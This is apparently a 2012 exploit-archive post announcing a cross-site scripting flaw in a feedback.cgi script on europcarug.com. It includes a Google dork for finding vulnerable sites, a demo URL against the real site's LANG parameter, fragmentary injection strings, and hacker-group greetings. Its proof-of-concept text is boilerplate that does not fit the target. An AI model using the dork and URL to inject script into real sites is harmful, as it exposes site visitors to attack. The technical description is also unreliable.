################################################## # Exploit Title: Europcarug.com <= XSS Vulnerability # Date: 10/04/2012 # Author: Ryuzaki Lawlet # Web/Blog: http://justryuz.blogspot.com # Category: webapps # Security:RISK: High # Vendor or Software Link: - # Google dork: inurl:/cgi-bin/feedback.cgi # Tested on: Linux ################################################## [~]Exploit/p0c : http://localhost:80/cgi-bin/feedback.cgi?[webapps]=[xss] [~]Proof of Concept: 1.1 he issue can be exploited by an insert on the Created Object function with script code as value. The result is the persistent execution out of the web application context. Strings: >"< OR >" [~]Dem0 : http://www.europcarug.com/cgi-bin/feedback.cgi?LANG=[xss] FB : www.fb.me/justryuz +---------------------------------------------------+   Greetz to : [ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,] [ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle = Ana dira CyberSEC = Nadea CyberSEC ] [ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ] -----------------------------------------------------+ CyberSEC © 2012 All rights reserved.